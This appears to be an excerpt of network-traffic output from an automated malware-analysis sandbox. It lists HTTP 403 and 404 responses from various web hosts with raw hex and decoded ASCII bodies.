                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:30 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:30 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:30 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HMEnKR1XA+4gsPKvpF+JNj,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1690487070.74418650897216715X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 google
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=18X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 541b4ecc-c543-4d44-ac6e-03fd8269375bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pll0327oqyPygoUJcs%2FXmgE7RTELwhmSq66AMDnaMmuGNbYJrwq0eekBpiU7dqYgZ6x1NVBudTfhlFqQNHt3zSTwVCl2s38LMekB6GJQmc7UyNTRqWFjPkJ9EOXvGgraAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=380.999804Server: cloudflareCF-RAY: 7ed760ad3a712c71-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:33 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:33 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:44:23 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 1b1a501c-d138-45ef-bb39-cb61e3191720CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9UgpaD2wDjDXuXJXpViF8jgOObOBi%2BSQhezI53bZBUfnQIBy6X7sRiskD0WI6zppXBA6iT3T0xXegJ6A%2BsGwViICgtcLrGC0M4SvTpYSAgSv%2ByHTNWhbOL0CmQLyEb8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=157.999992Server: cloudflareCF-RAY: 7ed760b30aa99116-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:44:35 GMTX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Zen-Fury: 12e78b184cbe67ddb4aa050f77f66f4f4c5be71bData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 31 35 30 22 2c 20 31 36 39 30 34 38 37 30 36 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 36 3a 33 35 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4150", 1690487068, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:44:38 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:44:39 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BRhEavsOnQViNGEyYzYwN2JkY2IyMzE5NzQwMDg3YjljOTliOWRm;Path=/X-Contextid: uNxutONR/aSSpaBV2Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:44:39 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BQPbRgGsZsPpZDBlYjI3MDdlOGY2YTc1YjkwYjZhMTU3YjAwOGU0;Path=/X-Contextid: 4Lv4nwND/KWExeRmuData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:39 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:39 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this 